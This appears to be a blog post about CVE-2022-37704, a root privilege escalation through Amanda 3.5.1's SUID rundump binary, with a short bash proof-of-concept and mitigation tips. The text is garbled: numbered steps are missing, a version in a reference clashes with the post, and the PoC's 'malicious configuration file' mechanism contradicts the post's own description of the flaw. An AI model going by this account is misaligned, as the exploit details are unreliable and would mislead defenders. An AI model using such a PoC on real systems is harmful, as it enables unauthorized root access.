CVE-2022-37704 - Amanda 3.5.1 Privilege Escalation Vulnerability: From Backup User to Root Access

The open-source backup and recovery software Amanda 3.5.1, also known as Advanced Maryland Automatic Network Disk Archiver, has a privilege escalation vulnerability, which has been assigned the CVE-2022-37704 identifier. This vulnerability allows a regular user with backup privileges to escalate their permissions to root access. This long read post will explore the details of this vulnerability, the related exploit, and offer the necessary mitigation steps.

Background

Amanda is designed to protect data on a network, ensuring that all backups are done in a timely and efficient manner. The software works by storing the backup data in a designated storage space accessible only by a backup user with limited rights. However, the vulnerability in Amanda 3.5.1 jeopardizes the security of these backups due to its potential to grant attackers unauthorized root access.

Description of the Vulnerability (CVE-2022-37704)

The privilege escalation vulnerability affects the SUID binary located at /lib/amanda/rundump. This binary is responsible for executing /usr/sbin/dump as root with controlled arguments provided by the attacker. When exploited, this vulnerability can lead to privilege escalation, denial of service, and information disclosure.

Attacker executes the rundump binary, which reads the malicious configuration file.

4. rundump binary executes /usr/sbin/dump with the provided arguments.

Proof of Concept Code Snippet

#!/bin/bash

# Proof of Concept for CVE-2022-37704
#
# This requires access to the 'backup' user on the system running Amanda 3.5.1

echo "Creating malicious dump configuration file..."
echo "amandatesT.sh" > /tmp/amanda.conf
echo "if [ ! -d /tmp/amandatesT ]; then mkdir /tmp/amandatesT; fi" >> /tmp/amanda.conf
echo "printenv > /tmp/amandatesT/exploit_output" >> /tmp/amanda.conf
echo "exit" >> /tmp/amanda.conf

echo "Executing Amanda's rundump binary with the malicious configuration file..."
/lib/amanda/rundump /tmp/amanda.conf

This proof of concept (PoC) code demonstrates how an attacker can create a malicious configuration file and execute the rundump binary with that file, ultimately resulting in code execution with root privileges.

Original References

1. CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2022-37704
2. Amanda Documentation: http://docs.zmanda.com/
3. Security Advisory: https://packetstormsecurity.com/files/185693/AMANDA-Backup-371-Privesc.html

Ensure that SUID is disabled on the rundump binary.

3. Restrict access to /lib/amanda/rundump and /usr/sbin/dump for only authorized users.

Conclusion

The CVE-2022-37704 vulnerability in Amanda 3.5.1 has the potential for causing significant security and data integrity issues. It is important to understand the exploit and take the necessary mitigation steps to protect your system against privilege escalation, denial of service, and information disclosure attacks. By updating Amanda, restricting access to crucial binaries, and closely monitoring backup user account permissions, you can better equip your organization to safeguard its valuable data.

Timeline

Published on: 04/16/2023 01:15:00 UTC
Last modified on: 04/28/2023 18:24:00 UTC